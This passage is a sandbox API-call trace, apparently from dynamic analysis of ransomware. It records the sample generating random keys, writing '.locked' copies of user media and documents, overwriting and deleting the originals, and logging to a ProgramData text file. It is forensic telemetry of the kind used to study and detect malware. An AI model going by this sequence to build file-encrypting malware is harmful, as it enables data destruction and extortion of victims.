pbBuffer=0x12766030) returned 1 [0318.661] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1237c181 | out: pbBuffer=0x1237c181) returned 1 [0318.661] WriteFile (in: hFile=0x1c8, lpBuffer=0x126bd000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1262dd78, lpOverlapped=0x0 | out: lpBuffer=0x126bd000*, lpNumberOfBytesWritten=0x1262dd78*=0x80, lpOverlapped=0x0) returned 1 [0318.676] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0x1) returned 0x102 [0318.678] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0318.679] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3342fb30, ulCount=0x10, ulNumEntriesRemoved=0x3342fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3342fb30, ulNumEntriesRemoved=0x3342fb10) returned 0 [0318.679] SetEvent (hEvent=0x134) returned 1 [0318.679] SetEvent (hEvent=0x220) returned 1 [0318.679] SetEvent (hEvent=0x22c) returned 1 [0318.679] ReadFile (in: hFile=0x188, lpBuffer=0x13882000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1262dd68, lpOverlapped=0x0 | out: lpBuffer=0x13882000*, lpNumberOfBytesRead=0x1262dd68*=0x594d, lpOverlapped=0x0) returned 1 [0318.680] WriteFile (in: hFile=0x1c8, lpBuffer=0x13882000*, nNumberOfBytesToWrite=0x594d, lpNumberOfBytesWritten=0x1262dd74, lpOverlapped=0x0 | out: lpBuffer=0x13882000*, lpNumberOfBytesWritten=0x1262dd74*=0x594d, lpOverlapped=0x0) returned 1 [0318.757] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0318.896] ReadFile (in: hFile=0x188, lpBuffer=0x13882000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1262dd68, lpOverlapped=0x0 | out: lpBuffer=0x13882000*, lpNumberOfBytesRead=0x1262dd68*=0x0, lpOverlapped=0x0) returned 1 [0318.897] CloseHandle (hObject=0x1c8) returned 1 [0318.897] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0319.000] CloseHandle (hObject=0x188) returned 1 [0319.000] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0319.000] GetConsoleMode (in: hConsoleHandle=0x188, lpMode=0x1262de94 | out: lpMode=0x1262de94) returned 0 [0319.000] WriteFile (in: hFile=0x188, lpBuffer=0x125741e0*, nNumberOfBytesToWrite=0x48, lpNumberOfBytesWritten=0x1262de64, lpOverlapped=0x0 | out: lpBuffer=0x125741e0*, lpNumberOfBytesWritten=0x1262de64*=0x48, lpOverlapped=0x0) returned 1 [0319.001] CloseHandle (hObject=0x188) returned 1 [0319.001] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\FUcQzp6TqxWfef2jhFpt.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\fucqzp6tqxwfef2jhfpt.mp4")) returned 1 [0320.340] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0x1) returned 0x0 [0320.343] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3342fb30, ulCount=0x10, ulNumEntriesRemoved=0x3342fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3342fb30, ulNumEntriesRemoved=0x3342fb10) returned 0 [0320.343] SetEvent (hEvent=0x150) returned 1 [0320.343] SetEvent (hEvent=0x198) returned 1 [0320.343] SetEvent (hEvent=0x1f0) returned 1 [0320.343] SetEvent (hEvent=0x214) returned 1 [0320.362] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0x1) returned 0x102 [0320.364] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0320.364] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0x1) returned 0x102 [0320.368] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0320.368] SetEvent (hEvent=0x1e8) returned 1 [0320.368] SetEvent (hEvent=0x134) returned 1 [0320.368] SetEvent (hEvent=0x180) returned 1 [0320.368] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0320.371] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3342fb34, ulCount=0x10, ulNumEntriesRemoved=0x3342fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3342fb34, ulNumEntriesRemoved=0x3342fb14) returned 0 [0320.371] SetEvent (hEvent=0x150) returned 1 [0320.371] SetEvent (hEvent=0x180) returned 1 [0320.371] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\FUcQzp6TqxWfef2jhFpt.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\fucqzp6tqxwfef2jhfpt.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0320.441] GetConsoleMode (in: hConsoleHandle=0x1f8, lpMode=0x12659e88 | out: lpMode=0x12659e88) returned 0 [0320.441] WriteFile (in: hFile=0x1f8, lpBuffer=0x1351c000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x12659e78, lpOverlapped=0x0 | out: lpBuffer=0x1351c000*, lpNumberOfBytesWritten=0x12659e78*=0xfa000, lpOverlapped=0x0) returned 1 [0320.462] CloseHandle (hObject=0x1f8) returned 1 [0320.494] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0320.510] SetEvent (hEvent=0x14c) returned 1 [0320.511] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0320.512] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0320.624] SetEvent (hEvent=0x190) returned 1 [0320.624] SetEvent (hEvent=0x220) returned 1 [0320.624] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0320.704] SetEvent (hEvent=0x22c) returned 1 [0320.704] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\9eQ3WMUXkM.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\9eq3wmuxkm.mp4")) returned 1 [0320.733] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0321.077] SetEvent (hEvent=0x104) returned 1 [0321.077] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0321.085] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\MCHoHyAA18 aW.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\mchohyaa18 aw.avi")) returned 1 [0321.121] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e020*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x1265ba24, lpReserved=0x0 | out: lpBuffer=0x1263e020*, lpNumberOfCharsWritten=0x1265ba24*=0xc) returned 1 [0321.124] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\lPGoKFmU.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\lpgokfmu.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x23c [0321.125] GetConsoleMode (in: hConsoleHandle=0x23c, lpMode=0x1265bd9c | out: lpMode=0x1265bd9c) returned 0 [0321.125] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\lPGoKFmU.swf.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\lpgokfmu.swf.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0321.242] GetConsoleMode (in: hConsoleHandle=0x1f8, lpMode=0x1265bd9c | out: lpMode=0x1265bd9c) returned 0 [0321.242] SetEvent (hEvent=0x190) returned 1 [0321.242] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0321.245] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0321.246] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0321.317] SetEvent (hEvent=0x220) returned 1 [0321.317] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0321.325] SetEvent (hEvent=0x190) returned 1 [0321.325] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0321.345] SetEvent (hEvent=0x12c) returned 1 [0321.345] SetEvent (hEvent=0x214) returned 1 [0321.345] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0321.375] SetEvent (hEvent=0x12c) returned 1 [0321.375] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0321.380] SetEvent (hEvent=0x220) returned 1 [0321.381] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0321.394] SetEvent (hEvent=0x214) returned 1 [0321.394] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0321.398] SetEvent (hEvent=0x214) returned 1 [0321.398] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0321.445] SetEvent (hEvent=0x14c) returned 1 [0321.446] SetEvent (hEvent=0x190) returned 1 [0321.446] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0x1) returned 0x102 [0321.453] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0321.453] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0x1) returned 0x0 [0321.454] SetEvent (hEvent=0x190) returned 1 [0321.454] SetEvent (hEvent=0x214) returned 1 [0321.454] SetEvent (hEvent=0x22c) returned 1 [0321.454] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0321.455] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3342fb34, ulCount=0x10, ulNumEntriesRemoved=0x3342fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3342fb34, ulNumEntriesRemoved=0x3342fb14) returned 0 [0321.455] SetEvent (hEvent=0x150) returned 1 [0321.455] SetEvent (hEvent=0x22c) returned 1 [0321.455] SetEvent (hEvent=0x12c) returned 1 [0321.455] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0321.512] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0321.551] SetEvent (hEvent=0x220) returned 1 [0321.551] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0321.552] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0321.573] SetEvent (hEvent=0x220) returned 1 [0321.573] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0321.586] SetEvent (hEvent=0x220) returned 1 [0321.586] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0321.589] SetEvent (hEvent=0x220) returned 1 [0321.589] SetEvent (hEvent=0x12c) returned 1 [0321.589] SetEvent (hEvent=0x14c) returned 1 [0321.589] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0321.589] SetEvent (hEvent=0x220) returned 1 [0321.589] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0321.590] SetEvent (hEvent=0x220) returned 1 [0321.590] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0321.591] SetEvent (hEvent=0x220) returned 1 [0321.591] SetEvent (hEvent=0x12c) returned 1 [0321.591] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0321.591] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x125dbe94 | out: lpMode=0x125dbe94) returned 0 [0321.591] SwitchToThread () returned 1 [0321.591] SetEvent (hEvent=0x220) returned 1 [0321.591] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0321.592] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0321.657] SetEvent (hEvent=0x14c) returned 1 [0321.658] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0321.682] SetEvent (hEvent=0x14c) returned 1 [0321.682] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0321.684] SetEvent (hEvent=0x14c) returned 1 [0321.684] SwitchToThread () returned 1 [0321.685] SetEvent (hEvent=0x14c) returned 1 [0321.685] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) returned 0x0 [0321.685] WaitForSingleObject (hHandle=0x184, dwMilliseconds=0xffffffff) Thread: id = 437 os_tid = 0x7fc [0260.438] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3356ff58, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3356ff58*=0x1a0) returned 1 [0260.438] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x100000, lpStartAddress=0x44bd00, lpParameter=0x12760900, dwCreationFlags=0x10000, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a4 [0260.439] CloseHandle (hObject=0x1a4) returned 1 [0260.439] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\Documents\\My Music\\*", lpFindFileData=0x1265bac8 | out: lpFindFileData=0x1265bac8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0260.440] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0260.440] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x1265be94 | out: lpMode=0x1265be94) returned 0 [0260.440] WriteFile (in: hFile=0x1a4, lpBuffer=0x1234a240*, nNumberOfBytesToWrite=0x31, lpNumberOfBytesWritten=0x1265be64, lpOverlapped=0x0 | out: lpBuffer=0x1234a240*, lpNumberOfBytesWritten=0x1265be64*=0x31, lpOverlapped=0x0) returned 1 [0260.441] CloseHandle (hObject=0x1a4) returned 1 [0260.445] DeleteFileW (lpFileName="C:\\\\Users\\Public\\Documents\\My Music.locked" (normalized: "c:\\users\\public\\documents\\my music.locked")) returned 0 [0260.445] RemoveDirectoryW (lpPathName="C:\\\\Users\\Public\\Documents\\My Music.locked" (normalized: "c:\\users\\public\\documents\\my music.locked")) returned 0 [0260.445] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12390000*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x1265ba24, lpReserved=0x0 | out: lpBuffer=0x12390000*, lpNumberOfCharsWritten=0x1265ba24*=0xb) returned 1 [0260.466] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\_riLQBNOxB3yhpHCkj.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\_rilqbnoxb3yhphckj.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0260.466] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x1265bd9c | out: lpMode=0x1265bd9c) returned 0 [0260.600] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1ac [0260.600] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0260.658] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\_riLQBNOxB3yhpHCkj.mkv.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\_rilqbnoxb3yhphckj.mkv.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0261.062] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x1265bd9c | out: lpMode=0x1265bd9c) returned 0 [0261.063] SetEvent (hEvent=0x214) returned 1 [0261.063] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0x1) returned 0x102 [0261.071] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0261.071] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390000 | out: pbBuffer=0x12390000) returned 1 [0261.071] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12392060 | out: pbBuffer=0x12392060) returned 1 [0261.072] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1237c081 | out: pbBuffer=0x1237c081) returned 1 [0261.072] WriteFile (in: hFile=0x218, lpBuffer=0x126c3000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1265bd78, lpOverlapped=0x0 | out: lpBuffer=0x126c3000*, lpNumberOfBytesWritten=0x1265bd78*=0x80, lpOverlapped=0x0) returned 1 [0261.073] VirtualAlloc (lpAddress=0x14f80000, dwSize=0x9d0000, flAllocationType=0x1000, flProtect=0x4) returned 0x14f80000 [0261.177] VirtualAlloc (lpAddress=0x10daa000, dwSize=0x9e000, flAllocationType=0x1000, flProtect=0x4) returned 0x10daa000 [0261.179] VirtualAlloc (lpAddress=0x216a000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x216a000 [0261.343] SetEvent (hEvent=0x104) returned 1 [0261.343] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0261.355] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0261.819] ReadFile (in: hFile=0x1a4, lpBuffer=0x14966000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1276dd68, lpOverlapped=0x0 | out: lpBuffer=0x14966000*, lpNumberOfBytesRead=0x1276dd68*=0x11f1c, lpOverlapped=0x0) returned 1 [0261.825] WriteFile (in: hFile=0x218, lpBuffer=0x14966000*, nNumberOfBytesToWrite=0x11f1c, lpNumberOfBytesWritten=0x1276dd74, lpOverlapped=0x0 | out: lpBuffer=0x14966000*, lpNumberOfBytesWritten=0x1276dd74*=0x11f1c, lpOverlapped=0x0) returned 1 [0261.900] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0262.413] SetEvent (hEvent=0x1f0) returned 1 [0262.413] ReadFile (in: hFile=0x1a4, lpBuffer=0x14966000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1276dd68, lpOverlapped=0x0 | out: lpBuffer=0x14966000*, lpNumberOfBytesRead=0x1276dd68*=0x0, lpOverlapped=0x0) returned 1 [0262.414] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0263.014] CloseHandle (hObject=0x218) returned 1 [0263.019] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0265.639] CloseHandle (hObject=0x1a4) returned 1 [0265.640] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0265.640] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x1276de94 | out: lpMode=0x1276de94) returned 0 [0265.668] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0266.040] WriteFile (in: hFile=0x1a4, lpBuffer=0x1234a240*, nNumberOfBytesToWrite=0x3a, lpNumberOfBytesWritten=0x1276de64, lpOverlapped=0x0 | out: lpBuffer=0x1234a240*, lpNumberOfBytesWritten=0x1276de64*=0x3a, lpOverlapped=0x0) returned 1 [0266.274] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0269.700] CloseHandle (hObject=0x1a4) returned 1 [0269.700] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\_riLQBNOxB3yhpHCkj.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\_rilqbnoxb3yhphckj.mkv")) returned 1 [0270.150] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0270.199] SetEvent (hEvent=0x1dc) returned 1 [0270.199] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0270.204] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0270.229] SetEvent (hEvent=0x22c) returned 1 [0270.229] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0270.259] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0270.316] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0x1) returned 0x102 [0270.413] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0270.413] SetEvent (hEvent=0x104) returned 1 [0270.413] SetEvent (hEvent=0x22c) returned 1 [0270.414] SetEvent (hEvent=0x12c) returned 1 [0270.414] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0270.463] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3356fb34, ulCount=0x10, ulNumEntriesRemoved=0x3356fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3356fb34, ulNumEntriesRemoved=0x3356fb14) returned 0 [0270.463] SetEvent (hEvent=0x12c) returned 1 [0270.463] SetEvent (hEvent=0x22c) returned 1 [0270.464] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\SEX0J5RG1Om3TZ.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\sex0j5rg1om3tz.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0270.946] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0273.374] GetConsoleMode (in: hConsoleHandle=0x188, lpMode=0x1239de88 | out: lpMode=0x1239de88) returned 0 [0273.374] WriteFile (in: hFile=0x188, lpBuffer=0x151ea000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1239de78, lpOverlapped=0x0 | out: lpBuffer=0x151ea000*, lpNumberOfBytesWritten=0x1239de78*=0xfa000, lpOverlapped=0x0) returned 1 [0273.400] CloseHandle (hObject=0x188) returned 1 [0273.465] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\SEX0J5RG1Om3TZ.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\sex0j5rg1om3tz.mp4")) returned 1 [0273.694] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0273.822] SetEvent (hEvent=0x190) returned 1 [0273.822] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0273.829] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0274.024] SetEvent (hEvent=0x20c) returned 1 [0274.024] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0274.074] SetEvent (hEvent=0x20c) returned 1 [0274.074] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0274.147] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\PNlMo1Rui9-Os7LqiJYf.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\pnlmo1rui9-os7lqijyf.swf")) returned 1 [0274.167] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e000*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x12659a24, lpReserved=0x0 | out: lpBuffer=0x1263e000*, lpNumberOfCharsWritten=0x12659a24*=0xb) returned 1 [0274.180] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0274.459] SetEvent (hEvent=0x12c) returned 1 [0274.459] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0274.663] SetEvent (hEvent=0x104) returned 1 [0274.663] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0276.033] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0276.088] SetEvent (hEvent=0x14c) returned 1 [0276.088] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c200*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x12659a24, lpReserved=0x0 | out: lpBuffer=0x1234c200*, lpNumberOfCharsWritten=0x12659a24*=0xb) returned 1 [0276.128] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\b1s7y96Y6gVCDj\\7pK8Q9_TXKB_8t_99Nak.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\b1s7y96y6gvcdj\\7pk8q9_txkb_8t_99nak.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0276.128] GetConsoleMode (in: hConsoleHandle=0x228, lpMode=0x12659d9c | out: lpMode=0x12659d9c) returned 0 [0276.128] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\b1s7y96Y6gVCDj\\7pK8Q9_TXKB_8t_99Nak.gif.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\b1s7y96y6gvcdj\\7pk8q9_txkb_8t_99nak.gif.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0276.399] GetConsoleMode (in: hConsoleHandle=0x230, lpMode=0x12659d9c | out: lpMode=0x12659d9c) returned 0 [0276.399] SetEvent (hEvent=0x22c) returned 1 [0276.399] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0276.445] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0276.625] SetEvent (hEvent=0x21c) returned 1 [0276.625] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0276.851] SetEvent (hEvent=0x1dc) returned 1 [0276.851] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0277.200] SetEvent (hEvent=0x1dc) returned 1 [0277.247] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\ZA606Y.rtf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\za606y.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0277.261] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0277.911] SetEvent (hEvent=0x184) returned 1 [0277.911] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x1276ae88 | out: lpMode=0x1276ae88) returned 0 [0277.911] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 